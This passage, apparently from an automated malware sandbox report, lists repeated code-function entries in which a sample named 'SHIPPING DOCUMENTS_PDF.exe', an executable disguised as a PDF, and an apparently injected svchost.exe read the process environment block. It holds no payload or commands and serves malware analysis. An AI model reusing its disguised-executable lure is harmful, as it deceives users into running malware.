                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_009B3510 mov eax, dword ptr fs:[00000030h]0_2_009B3510
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_009B1E70 mov eax, dword ptr fs:[00000030h]0_2_009B1E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]2_2_0302C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]2_2_03050310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov ecx, dword ptr fs:[00000030h]2_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]2_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]2_2_030D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310634F mov eax, dword ptr fs:[00000030h]2_2_0310634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]2_2_030D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]2_2_030EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]2_2_030B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]2_2_030663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]2_2_0302823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310625D mov eax, dword ptr fs:[00000030h]2_2_0310625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]2_2_0302A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]2_2_03036259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]2_2_0302826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031062D6 mov eax, dword ptr fs:[00000030h]2_2_031062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030280A0 mov eax, dword ptr fs:[00000030h]2_2_030280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
